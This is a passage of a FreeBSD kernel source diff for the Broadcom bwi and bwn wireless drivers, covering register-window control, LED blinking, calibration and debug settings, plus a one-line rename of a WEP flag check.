bwi_regwin_enable(sc, bus, 0); /* Disable interrupts */ CSR_WRITE_4(sc, BWI_INTRVEC, 0); return bwi_regwin_switch(sc, old, NULL); } static const char * bwi_regwin_name(const struct bwi_regwin *rw) { switch (rw->rw_type) { case BWI_REGWIN_T_COM: return "COM"; case BWI_REGWIN_T_BUSPCI: return "PCI"; case BWI_REGWIN_T_MAC: return "MAC"; case BWI_REGWIN_T_BUSPCIE: return "PCIE"; } panic("unknown regwin type 0x%04x\n", rw->rw_type); return NULL; } static uint32_t bwi_regwin_disable_bits(struct bwi_softc *sc) { uint32_t busrev; /* XXX cache this */ busrev = __SHIFTOUT(CSR_READ_4(sc, BWI_ID_LO), BWI_ID_LO_BUSREV_MASK); DPRINTF(sc, BWI_DBG_ATTACH | BWI_DBG_INIT | BWI_DBG_MISC, "bus rev %u\n", busrev); if (busrev == BWI_BUSREV_0) return BWI_STATE_LO_DISABLE1; else if (busrev == BWI_BUSREV_1) return BWI_STATE_LO_DISABLE2; else return (BWI_STATE_LO_DISABLE1 | BWI_STATE_LO_DISABLE2); } int bwi_regwin_is_enabled(struct bwi_softc *sc, struct bwi_regwin *rw) { uint32_t val, disable_bits;
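/*
 * Sketch of the check performed below: a register window (core) counts as
 * enabled only when its clock bit is set while the reset bit and the
 * bus-revision specific disable bits are all clear, roughly
 *
 *	enabled = (state_lo & (BWI_STATE_LO_CLOCK | BWI_STATE_LO_RESET |
 *	    disable_bits)) == BWI_STATE_LO_CLOCK;
 *
 * where 'disable_bits' comes from bwi_regwin_disable_bits() and is
 * DISABLE1, DISABLE2 or both depending on the bus revision.
 */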
disable_bits = bwi_regwin_disable_bits(sc); val = CSR_READ_4(sc, BWI_STATE_LO); if ((val & (BWI_STATE_LO_CLOCK | BWI_STATE_LO_RESET | disable_bits)) == BWI_STATE_LO_CLOCK) { DPRINTF(sc, BWI_DBG_ATTACH | BWI_DBG_INIT, "%s is enabled\n", bwi_regwin_name(rw)); return 1; } else { DPRINTF(sc, BWI_DBG_ATTACH | BWI_DBG_INIT, "%s is disabled\n", bwi_regwin_name(rw)); return 0; } } void bwi_regwin_disable(struct bwi_softc *sc, struct bwi_regwin *rw, uint32_t flags) { uint32_t state_lo, disable_bits; int i; state_lo = CSR_READ_4(sc, BWI_STATE_LO); /* * If current regwin is in 'reset' state, it was already disabled. */ if (state_lo & BWI_STATE_LO_RESET) { DPRINTF(sc, BWI_DBG_ATTACH | BWI_DBG_INIT, "%s was already disabled\n", bwi_regwin_name(rw)); return; } disable_bits = bwi_regwin_disable_bits(sc); /* * Disable normal clock */ state_lo = BWI_STATE_LO_CLOCK | disable_bits; CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* * Wait until normal clock is disabled */ #define NRETRY 1000 for (i = 0; i < NRETRY; ++i) { state_lo = CSR_READ_4(sc, BWI_STATE_LO); if (state_lo & disable_bits) break; DELAY(10); } if (i == NRETRY) { device_printf(sc->sc_dev, "%s disable clock timeout\n", bwi_regwin_name(rw)); } for (i = 0; i < NRETRY; ++i) { uint32_t state_hi; state_hi = CSR_READ_4(sc, BWI_STATE_HI); if ((state_hi & BWI_STATE_HI_BUSY) == 0) break; DELAY(10); } if (i == NRETRY) { device_printf(sc->sc_dev, "%s wait BUSY unset timeout\n", bwi_regwin_name(rw)); } #undef NRETRY /* * Reset and disable regwin with gated clock */ state_lo = BWI_STATE_LO_RESET | disable_bits | BWI_STATE_LO_CLOCK | BWI_STATE_LO_GATED_CLOCK | __SHIFTIN(flags, BWI_STATE_LO_FLAGS_MASK); CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* Flush pending bus write */ CSR_READ_4(sc, BWI_STATE_LO); DELAY(1); /* Reset and disable regwin */ state_lo = BWI_STATE_LO_RESET | disable_bits | __SHIFTIN(flags, BWI_STATE_LO_FLAGS_MASK); CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* Flush pending bus write */ CSR_READ_4(sc, BWI_STATE_LO); DELAY(1); } void bwi_regwin_enable(struct bwi_softc *sc, struct bwi_regwin *rw, uint32_t flags) { uint32_t state_lo, state_hi, imstate; bwi_regwin_disable(sc, rw, flags); /* Reset regwin with gated clock */ state_lo = BWI_STATE_LO_RESET | BWI_STATE_LO_CLOCK | BWI_STATE_LO_GATED_CLOCK | __SHIFTIN(flags, BWI_STATE_LO_FLAGS_MASK); CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* Flush pending bus write */ CSR_READ_4(sc, BWI_STATE_LO); DELAY(1); state_hi = CSR_READ_4(sc, BWI_STATE_HI); if (state_hi & BWI_STATE_HI_SERROR) CSR_WRITE_4(sc, BWI_STATE_HI, 0); imstate = CSR_READ_4(sc, BWI_IMSTATE); if (imstate & (BWI_IMSTATE_INBAND_ERR | BWI_IMSTATE_TIMEOUT)) { imstate &= ~(BWI_IMSTATE_INBAND_ERR | BWI_IMSTATE_TIMEOUT); CSR_WRITE_4(sc, BWI_IMSTATE, imstate); } /* Enable regwin with gated clock */ state_lo = BWI_STATE_LO_CLOCK | BWI_STATE_LO_GATED_CLOCK | __SHIFTIN(flags, BWI_STATE_LO_FLAGS_MASK); CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* Flush pending bus write */ CSR_READ_4(sc, BWI_STATE_LO); DELAY(1); /* Enable regwin with normal clock */ state_lo = BWI_STATE_LO_CLOCK | __SHIFTIN(flags, BWI_STATE_LO_FLAGS_MASK); CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* Flush pending bus write */ CSR_READ_4(sc, BWI_STATE_LO); DELAY(1); } static void bwi_set_bssid(struct bwi_softc *sc, const uint8_t *bssid) { struct ifnet *ifp = sc->sc_ifp; struct bwi_mac *mac; struct bwi_myaddr_bssid buf; const uint8_t *p; uint32_t val; int n, i; KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac 
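/*
 * The loop below packs the local MAC address followed by the BSSID into
 * 32-bit words and writes them to template memory starting at offset 0x20.
 * Each source byte j of a word lands in bits (8*j+7):(8*j), i.e. for one
 * word (names here are local to this sketch):
 *
 *	word = 0;
 *	for (j = 0; j < 4; ++j)
 *		word |= (uint32_t)bytes[j] << (j * 8);
 *
 * which is exactly the least-significant-byte-first packing done by the
 * inner loop over 'p' below.
 */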
*)sc->sc_cur_regwin; bwi_set_addr_filter(sc, BWI_ADDR_FILTER_BSSID, bssid); bcopy(IF_LLADDR(ifp), buf.myaddr, sizeof(buf.myaddr)); bcopy(bssid, buf.bssid, sizeof(buf.bssid)); n = sizeof(buf) / sizeof(val); p = (const uint8_t *)&buf; for (i = 0; i < n; ++i) { int j; val = 0; for (j = 0; j < sizeof(val); ++j) val |= ((uint32_t)(*p++)) << (j * 8); TMPLT_WRITE_4(mac, 0x20 + (i * sizeof(val)), val); } } static void bwi_updateslot(struct ifnet *ifp) { struct bwi_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct bwi_mac *mac; BWI_LOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) { DPRINTF(sc, BWI_DBG_80211, "%s\n", __func__); KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; bwi_mac_updateslot(mac, (ic->ic_flags & IEEE80211_F_SHSLOT)); } BWI_UNLOCK(sc); } static void bwi_calibrate(void *xsc) { struct bwi_softc *sc = xsc; #ifdef INVARIANTS struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; #endif struct bwi_mac *mac; BWI_ASSERT_LOCKED(sc); KASSERT(ic->ic_opmode != IEEE80211_M_MONITOR, ("opmode %d", ic->ic_opmode)); KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; bwi_mac_calibrate_txpower(mac, sc->sc_txpwrcb_type); sc->sc_txpwrcb_type = BWI_TXPWR_CALIB; /* XXX 15 seconds */ callout_reset(&sc->sc_calib_ch, hz * 15, bwi_calibrate, sc); } static int bwi_calc_rssi(struct bwi_softc *sc, const struct bwi_rxbuf_hdr *hdr) { struct bwi_mac *mac; KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; return bwi_rf_calc_rssi(mac, hdr); } static int bwi_calc_noise(struct bwi_softc *sc) { struct bwi_mac *mac; KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; return bwi_rf_calc_noise(mac); } static __inline uint8_t bwi_plcp2rate(const uint32_t plcp0, enum ieee80211_phytype type) { uint32_t plcp = le32toh(plcp0) & IEEE80211_OFDM_PLCP_RATE_MASK; return (ieee80211_plcp2rate(plcp, type)); } static void bwi_rx_radiotap(struct bwi_softc *sc, struct mbuf *m, struct bwi_rxbuf_hdr *hdr, const void *plcp, int rate, int rssi, int noise) { const struct ieee80211_frame_min *wh; sc->sc_rx_th.wr_flags = IEEE80211_RADIOTAP_F_FCS; if (htole16(hdr->rxh_flags1) & BWI_RXH_F1_SHPREAMBLE) sc->sc_rx_th.wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; wh = mtod(m, const struct ieee80211_frame_min *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) sc->sc_rx_th.wr_flags |= IEEE80211_RADIOTAP_F_WEP; sc->sc_rx_th.wr_tsf = hdr->rxh_tsf; /* No endian conversion */ sc->sc_rx_th.wr_rate = rate; sc->sc_rx_th.wr_antsignal = rssi; sc->sc_rx_th.wr_antnoise = noise; } static void bwi_led_attach(struct bwi_softc *sc) { const uint8_t *led_act = NULL; uint16_t gpio, val[BWI_LED_MAX]; int i; #define N(arr) (int)(sizeof(arr) / sizeof(arr[0])) for (i = 0; i < N(bwi_vendor_led_act); ++i) { if (sc->sc_pci_subvid == bwi_vendor_led_act[i].vid) { led_act = bwi_vendor_led_act[i].led_act; break; } } if (led_act == NULL) led_act = bwi_default_led_act; #undef N gpio = bwi_read_sprom(sc, BWI_SPROM_GPIO01); val[0] = __SHIFTOUT(gpio, BWI_SPROM_GPIO_0); val[1] = __SHIFTOUT(gpio, BWI_SPROM_GPIO_1); gpio = bwi_read_sprom(sc, BWI_SPROM_GPIO23); val[2] = __SHIFTOUT(gpio,
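/*
 * Sketch of how the per-LED SPROM values being gathered here are
 * interpreted by the loop that follows: a value of 0xff (which the code
 * treats as "nothing programmed in SPROM") falls back to the vendor or
 * default behaviour table, otherwise the byte carries an active-low flag
 * plus an action code:
 *
 *	if (val[i] == 0xff)
 *		act = led_act[i];
 *	else {
 *		actlow = (val[i] & BWI_LED_ACT_LOW) != 0;
 *		act    = __SHIFTOUT(val[i], BWI_LED_ACT_MASK);
 *	}
 *
 * The first blink-capable LED found becomes sc_blink_led, which
 * bwi_led_event() later drives on RX/TX activity.
 */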
BWI_SPROM_GPIO_2); val[3] = __SHIFTOUT(gpio, BWI_SPROM_GPIO_3); for (i = 0; i < BWI_LED_MAX; ++i) { struct bwi_led *led = &sc->sc_leds[i]; if (val[i] == 0xff) { led->l_act = led_act[i]; } else { if (val[i] & BWI_LED_ACT_LOW) led->l_flags |= BWI_LED_F_ACTLOW; led->l_act = __SHIFTOUT(val[i], BWI_LED_ACT_MASK); } led->l_mask = (1 << i); if (led->l_act == BWI_LED_ACT_BLINK_SLOW || led->l_act == BWI_LED_ACT_BLINK_POLL || led->l_act == BWI_LED_ACT_BLINK) { led->l_flags |= BWI_LED_F_BLINK; if (led->l_act == BWI_LED_ACT_BLINK_POLL) led->l_flags |= BWI_LED_F_POLLABLE; else if (led->l_act == BWI_LED_ACT_BLINK_SLOW) led->l_flags |= BWI_LED_F_SLOW; if (sc->sc_blink_led == NULL) { sc->sc_blink_led = led; if (led->l_flags & BWI_LED_F_SLOW) BWI_LED_SLOWDOWN(sc->sc_led_idle); } } DPRINTF(sc, BWI_DBG_LED | BWI_DBG_ATTACH, "%dth led, act %d, lowact %d\n", i, led->l_act, led->l_flags & BWI_LED_F_ACTLOW); } callout_init_mtx(&sc->sc_led_blink_ch, &sc->sc_mtx, 0); } static __inline uint16_t bwi_led_onoff(const struct bwi_led *led, uint16_t val, int on) { if (led->l_flags & BWI_LED_F_ACTLOW) on = !on; if (on) val |= led->l_mask; else val &= ~led->l_mask; return val; } static void bwi_led_newstate(struct bwi_softc *sc, enum ieee80211_state nstate) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t val; int i; if (nstate == IEEE80211_S_INIT) { callout_stop(&sc->sc_led_blink_ch); sc->sc_led_blinking = 0; } if ((ic->ic_ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; val = CSR_READ_2(sc, BWI_MAC_GPIO_CTRL); for (i = 0; i < BWI_LED_MAX; ++i) { struct bwi_led *led = &sc->sc_leds[i]; int on; if (led->l_act == BWI_LED_ACT_UNKN || led->l_act == BWI_LED_ACT_NULL) continue; if ((led->l_flags & BWI_LED_F_BLINK) && nstate != IEEE80211_S_INIT) continue; switch (led->l_act) { case BWI_LED_ACT_ON: /* Always on */ on = 1; break; case BWI_LED_ACT_OFF: /* Always off */ case BWI_LED_ACT_5GHZ: /* TODO: 11A */ on = 0; break; default: on = 1; switch (nstate) { case IEEE80211_S_INIT: on = 0; break; case IEEE80211_S_RUN: if (led->l_act == BWI_LED_ACT_11G && ic->ic_curmode != IEEE80211_MODE_11G) on = 0; break; default: if (led->l_act == BWI_LED_ACT_ASSOC) on = 0; break; } break; } val = bwi_led_onoff(led, val, on); } CSR_WRITE_2(sc, BWI_MAC_GPIO_CTRL, val); } static void bwi_led_event(struct bwi_softc *sc, int event) { struct bwi_led *led = sc->sc_blink_led; int rate; if (event == BWI_LED_EVENT_POLL) { if ((led->l_flags & BWI_LED_F_POLLABLE) == 0) return; if (ticks - sc->sc_led_ticks < sc->sc_led_idle) return; } sc->sc_led_ticks = ticks; if (sc->sc_led_blinking) return; switch (event) { case BWI_LED_EVENT_RX: rate = sc->sc_rx_rate; break; case BWI_LED_EVENT_TX: rate = sc->sc_tx_rate; break; case BWI_LED_EVENT_POLL: rate = 0; break; default: panic("unknown LED event %d\n", event); break; } bwi_led_blink_start(sc, bwi_led_duration[rate].on_dur, bwi_led_duration[rate].off_dur); } static void bwi_led_blink_start(struct bwi_softc *sc, int on_dur, int off_dur) { struct bwi_led *led = sc->sc_blink_led; uint16_t val; val = CSR_READ_2(sc, BWI_MAC_GPIO_CTRL); val = bwi_led_onoff(led, val, 1); CSR_WRITE_2(sc, BWI_MAC_GPIO_CTRL, val); if (led->l_flags & BWI_LED_F_SLOW) { BWI_LED_SLOWDOWN(on_dur); BWI_LED_SLOWDOWN(off_dur); } sc->sc_led_blinking = 1; sc->sc_led_blink_offdur = off_dur; callout_reset(&sc->sc_led_blink_ch, on_dur, bwi_led_blink_next, sc); } static void bwi_led_blink_next(void *xsc) { struct bwi_softc *sc = xsc; uint16_t val; val = CSR_READ_2(sc, BWI_MAC_GPIO_CTRL); val = bwi_led_onoff(sc->sc_blink_led, 
val, 0); CSR_WRITE_2(sc, BWI_MAC_GPIO_CTRL, val); callout_reset(&sc->sc_led_blink_ch, sc->sc_led_blink_offdur, bwi_led_blink_end, sc); } static void bwi_led_blink_end(void *xsc) { struct bwi_softc *sc = xsc; sc->sc_led_blinking = 0; } static void bwi_restart(void *xsc, int pending) { struct bwi_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; if_printf(ifp, "%s begin, help!\n", __func__); BWI_LOCK(sc); bwi_init_statechg(xsc, 0); #if 0 bwi_start_locked(ifp); #endif BWI_UNLOCK(sc); } diff --git a/sys/dev/bwn/if_bwn.c b/sys/dev/bwn/if_bwn.c index e7174ebd189e..cc34b12095e0 100644 --- a/sys/dev/bwn/if_bwn.c +++ b/sys/dev/bwn/if_bwn.c @@ -1,14242 +1,14242 @@ /*- * Copyright (c) 2009-2010 Weongyo Jeong * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer, * without modification. * 2. Redistributions in binary form must reproduce at minimum a disclaimer * similar to the "NO WARRANTY" disclaimer below ("Disclaimer") and any * redistribution must be conditioned upon including a substantially * similar Disclaimer requirement for further binary redistribution. * * NO WARRANTY * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF NONINFRINGEMENT, MERCHANTIBILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR SPECIAL, EXEMPLARY, * OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGES. */ #include __FBSDID("$FreeBSD$"); /* * The Broadcom Wireless LAN controller driver. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include static SYSCTL_NODE(_hw, OID_AUTO, bwn, CTLFLAG_RD, 0, "Broadcom driver parameters"); /* * Tunable & sysctl variables. 
*/ #ifdef BWN_DEBUG static int bwn_debug = 0; SYSCTL_INT(_hw_bwn, OID_AUTO, debug, CTLFLAG_RW, &bwn_debug, 0, "Broadcom debugging printfs"); TUNABLE_INT("hw.bwn.debug", &bwn_debug); enum { BWN_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ BWN_DEBUG_RECV = 0x00000002, /* basic recv operation */ BWN_DEBUG_STATE = 0x00000004, /* 802.11 state transitions */ BWN_DEBUG_TXPOW = 0x00000008, /* tx power processing */ BWN_DEBUG_RESET = 0x00000010, /* reset processing */ BWN_DEBUG_OPS = 0x00000020, /* bwn_ops processing */ BWN_DEBUG_BEACON = 0x00000040, /* beacon handling */ BWN_DEBUG_WATCHDOG = 0x00000080, /* watchdog timeout */ BWN_DEBUG_INTR = 0x00000100, /* ISR */ BWN_DEBUG_CALIBRATE = 0x00000200, /* periodic calibration */ BWN_DEBUG_NODE = 0x00000400, /* node management */ BWN_DEBUG_LED = 0x00000800, /* led management */ BWN_DEBUG_CMD = 0x00001000, /* cmd submission */ BWN_DEBUG_LO = 0x00002000, /* LO */ BWN_DEBUG_FW = 0x00004000, /* firmware */ BWN_DEBUG_WME = 0x00008000, /* WME */ BWN_DEBUG_RF = 0x00010000, /* RF */ BWN_DEBUG_FATAL = 0x80000000, /* fatal errors */ BWN_DEBUG_ANY = 0xffffffff }; #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->sc_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) do { (void) sc; } while (0) #endif static int bwn_bfp = 0; /* use "Bad Frames Preemption" */ SYSCTL_INT(_hw_bwn, OID_AUTO, bfp, CTLFLAG_RW, &bwn_bfp, 0, "uses Bad Frames Preemption"); static int bwn_bluetooth = 1; SYSCTL_INT(_hw_bwn, OID_AUTO, bluetooth, CTLFLAG_RW, &bwn_bluetooth, 0, "turns on Bluetooth Coexistence"); static int bwn_hwpctl = 0; SYSCTL_INT(_hw_bwn, OID_AUTO, hwpctl, CTLFLAG_RW, &bwn_hwpctl, 0, "uses H/W power control"); static int bwn_msi_disable = 0; /* MSI disabled */ TUNABLE_INT("hw.bwn.msi_disable", &bwn_msi_disable); static int bwn_usedma = 1; SYSCTL_INT(_hw_bwn, OID_AUTO, usedma, CTLFLAG_RD, &bwn_usedma, 0, "uses DMA"); TUNABLE_INT("hw.bwn.usedma", &bwn_usedma); static int bwn_wme = 1; SYSCTL_INT(_hw_bwn, OID_AUTO, wme, CTLFLAG_RW, &bwn_wme, 0, "uses WME support"); static int bwn_attach_pre(struct bwn_softc *); static int bwn_attach_post(struct bwn_softc *); static void bwn_sprom_bugfixes(device_t); static void bwn_init(void *); static int bwn_init_locked(struct bwn_softc *); static int bwn_ioctl(struct ifnet *, u_long, caddr_t); static void bwn_start(struct ifnet *); static int bwn_attach_core(struct bwn_mac *); static void bwn_reset_core(struct bwn_mac *, uint32_t); static int bwn_phy_getinfo(struct bwn_mac *, int); static int bwn_chiptest(struct bwn_mac *); static int bwn_setup_channels(struct bwn_mac *, int, int); static int bwn_phy_g_attach(struct bwn_mac *); static void bwn_phy_g_detach(struct bwn_mac *); static void bwn_phy_g_init_pre(struct bwn_mac *); static int bwn_phy_g_prepare_hw(struct bwn_mac *); static int bwn_phy_g_init(struct bwn_mac *); static void bwn_phy_g_exit(struct bwn_mac *); static uint16_t bwn_phy_g_read(struct bwn_mac *, uint16_t); static void bwn_phy_g_write(struct bwn_mac *, uint16_t, uint16_t); static uint16_t bwn_phy_g_rf_read(struct bwn_mac *, uint16_t); static void bwn_phy_g_rf_write(struct bwn_mac *, uint16_t, uint16_t); static int bwn_phy_g_hwpctl(struct bwn_mac *); static void bwn_phy_g_rf_onoff(struct bwn_mac *, int); static int bwn_phy_g_switch_channel(struct bwn_mac *, uint32_t); static uint32_t bwn_phy_g_get_default_chan(struct bwn_mac *); static void bwn_phy_g_set_antenna(struct bwn_mac *, int); static int bwn_phy_g_im(struct bwn_mac *, int); static int bwn_phy_g_recalc_txpwr(struct bwn_mac *, 
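/*
 * Usage note for the debug plumbing declared above (hedged: the wiring of
 * the bwn_debug tunable into sc->sc_debug is done elsewhere in this file):
 * the BWN_DEBUG_* values are independent bits, so categories are enabled
 * by OR-ing them into the hw.bwn.debug tunable/sysctl, e.g.
 *
 *	sysctl hw.bwn.debug=0x101	(basic xmit 0x1 plus ISR 0x100)
 *
 * DPRINTF() then emits a message only when its category bit is set in the
 * softc's debug mask.
 */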
int); static void bwn_phy_g_set_txpwr(struct bwn_mac *); static void bwn_phy_g_task_15s(struct bwn_mac *); static void bwn_phy_g_task_60s(struct bwn_mac *); static uint16_t bwn_phy_g_txctl(struct bwn_mac *); static void bwn_phy_switch_analog(struct bwn_mac *, int); static uint16_t bwn_shm_read_2(struct bwn_mac *, uint16_t, uint16_t); static void bwn_shm_write_2(struct bwn_mac *, uint16_t, uint16_t, uint16_t); static uint32_t bwn_shm_read_4(struct bwn_mac *, uint16_t, uint16_t); static void bwn_shm_write_4(struct bwn_mac *, uint16_t, uint16_t, uint32_t); static void bwn_shm_ctlword(struct bwn_mac *, uint16_t, uint16_t); static void bwn_addchannels(struct ieee80211_channel [], int, int *, const struct bwn_channelinfo *, int); static int bwn_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void bwn_updateslot(struct ifnet *); static void bwn_update_promisc(struct ifnet *); static void bwn_wme_init(struct bwn_mac *); static int bwn_wme_update(struct ieee80211com *); static void bwn_wme_clear(struct bwn_softc *); static void bwn_wme_load(struct bwn_mac *); static void bwn_wme_loadparams(struct bwn_mac *, const struct wmeParams *, uint16_t); static void bwn_scan_start(struct ieee80211com *); static void bwn_scan_end(struct ieee80211com *); static void bwn_set_channel(struct ieee80211com *); static struct ieee80211vap *bwn_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void bwn_vap_delete(struct ieee80211vap *); static void bwn_stop(struct bwn_softc *, int); static void bwn_stop_locked(struct bwn_softc *, int); static int bwn_core_init(struct bwn_mac *); static void bwn_core_start(struct bwn_mac *); static void bwn_core_exit(struct bwn_mac *); static void bwn_bt_disable(struct bwn_mac *); static int bwn_chip_init(struct bwn_mac *); static uint64_t bwn_hf_read(struct bwn_mac *); static void bwn_hf_write(struct bwn_mac *, uint64_t); static void bwn_set_txretry(struct bwn_mac *, int, int); static void bwn_rate_init(struct bwn_mac *); static void bwn_set_phytxctl(struct bwn_mac *); static void bwn_spu_setdelay(struct bwn_mac *, int); static void bwn_bt_enable(struct bwn_mac *); static void bwn_set_macaddr(struct bwn_mac *); static void bwn_crypt_init(struct bwn_mac *); static void bwn_chip_exit(struct bwn_mac *); static int bwn_fw_fillinfo(struct bwn_mac *); static int bwn_fw_loaducode(struct bwn_mac *); static int bwn_gpio_init(struct bwn_mac *); static int bwn_fw_loadinitvals(struct bwn_mac *); static int bwn_phy_init(struct bwn_mac *); static void bwn_set_txantenna(struct bwn_mac *, int); static void bwn_set_opmode(struct bwn_mac *); static void bwn_rate_write(struct bwn_mac *, uint16_t, int); static uint8_t bwn_plcp_getcck(const uint8_t); static uint8_t bwn_plcp_getofdm(const uint8_t); static void bwn_pio_init(struct bwn_mac *); static uint16_t bwn_pio_idx2base(struct bwn_mac *, int); static void bwn_pio_set_txqueue(struct bwn_mac *, struct bwn_pio_txqueue *, int); static void bwn_pio_setupqueue_rx(struct bwn_mac *, struct bwn_pio_rxqueue *, int); static void bwn_destroy_queue_tx(struct bwn_pio_txqueue *); static uint16_t bwn_pio_read_2(struct bwn_mac *, struct bwn_pio_txqueue *, uint16_t); static void bwn_pio_cancel_tx_packets(struct bwn_pio_txqueue *); static int bwn_pio_rx(struct bwn_pio_rxqueue *); static uint8_t bwn_pio_rxeof(struct bwn_pio_rxqueue *); static void bwn_pio_handle_txeof(struct bwn_mac *, const struct 
bwn_txstatus *); static uint16_t bwn_pio_rx_read_2(struct bwn_pio_rxqueue *, uint16_t); static uint32_t bwn_pio_rx_read_4(struct bwn_pio_rxqueue *, uint16_t); static void bwn_pio_rx_write_2(struct bwn_pio_rxqueue *, uint16_t, uint16_t); static void bwn_pio_rx_write_4(struct bwn_pio_rxqueue *, uint16_t, uint32_t); static int bwn_pio_tx_start(struct bwn_mac *, struct ieee80211_node *, struct mbuf *); static struct bwn_pio_txqueue *bwn_pio_select(struct bwn_mac *, uint8_t); static uint32_t bwn_pio_write_multi_4(struct bwn_mac *, struct bwn_pio_txqueue *, uint32_t, const void *, int); static void bwn_pio_write_4(struct bwn_mac *, struct bwn_pio_txqueue *, uint16_t, uint32_t); static uint16_t bwn_pio_write_multi_2(struct bwn_mac *, struct bwn_pio_txqueue *, uint16_t, const void *, int); static uint16_t bwn_pio_write_mbuf_2(struct bwn_mac *, struct bwn_pio_txqueue *, uint16_t, struct mbuf *); static struct bwn_pio_txqueue *bwn_pio_parse_cookie(struct bwn_mac *, uint16_t, struct bwn_pio_txpkt **); static void bwn_dma_init(struct bwn_mac *); static void bwn_dma_rxdirectfifo(struct bwn_mac *, int, uint8_t); static int bwn_dma_mask2type(uint64_t); static uint64_t bwn_dma_mask(struct bwn_mac *); static uint16_t bwn_dma_base(int, int); static void bwn_dma_ringfree(struct bwn_dma_ring **); static void bwn_dma_32_getdesc(struct bwn_dma_ring *, int, struct bwn_dmadesc_generic **, struct bwn_dmadesc_meta **); static void bwn_dma_32_setdesc(struct bwn_dma_ring *, struct bwn_dmadesc_generic *, bus_addr_t, uint16_t, int, int, int); static void bwn_dma_32_start_transfer(struct bwn_dma_ring *, int); static void bwn_dma_32_suspend(struct bwn_dma_ring *); static void bwn_dma_32_resume(struct bwn_dma_ring *); static int bwn_dma_32_get_curslot(struct bwn_dma_ring *); static void bwn_dma_32_set_curslot(struct bwn_dma_ring *, int); static void bwn_dma_64_getdesc(struct bwn_dma_ring *, int, struct bwn_dmadesc_generic **, struct bwn_dmadesc_meta **); static void bwn_dma_64_setdesc(struct bwn_dma_ring *, struct bwn_dmadesc_generic *, bus_addr_t, uint16_t, int, int, int); static void bwn_dma_64_start_transfer(struct bwn_dma_ring *, int); static void bwn_dma_64_suspend(struct bwn_dma_ring *); static void bwn_dma_64_resume(struct bwn_dma_ring *); static int bwn_dma_64_get_curslot(struct bwn_dma_ring *); static void bwn_dma_64_set_curslot(struct bwn_dma_ring *, int); static int bwn_dma_allocringmemory(struct bwn_dma_ring *); static void bwn_dma_setup(struct bwn_dma_ring *); static void bwn_dma_free_ringmemory(struct bwn_dma_ring *); static void bwn_dma_cleanup(struct bwn_dma_ring *); static void bwn_dma_free_descbufs(struct bwn_dma_ring *); static int bwn_dma_tx_reset(struct bwn_mac *, uint16_t, int); static void bwn_dma_rx(struct bwn_dma_ring *); static int bwn_dma_rx_reset(struct bwn_mac *, uint16_t, int); static void bwn_dma_free_descbuf(struct bwn_dma_ring *, struct bwn_dmadesc_meta *); static void bwn_dma_set_redzone(struct bwn_dma_ring *, struct mbuf *); static int bwn_dma_gettype(struct bwn_mac *); static void bwn_dma_ring_addr(void *, bus_dma_segment_t *, int, int); static int bwn_dma_freeslot(struct bwn_dma_ring *); static int bwn_dma_nextslot(struct bwn_dma_ring *, int); static void bwn_dma_rxeof(struct bwn_dma_ring *, int *); static int bwn_dma_newbuf(struct bwn_dma_ring *, struct bwn_dmadesc_generic *, struct bwn_dmadesc_meta *, int); static void bwn_dma_buf_addr(void *, bus_dma_segment_t *, int, bus_size_t, int); static 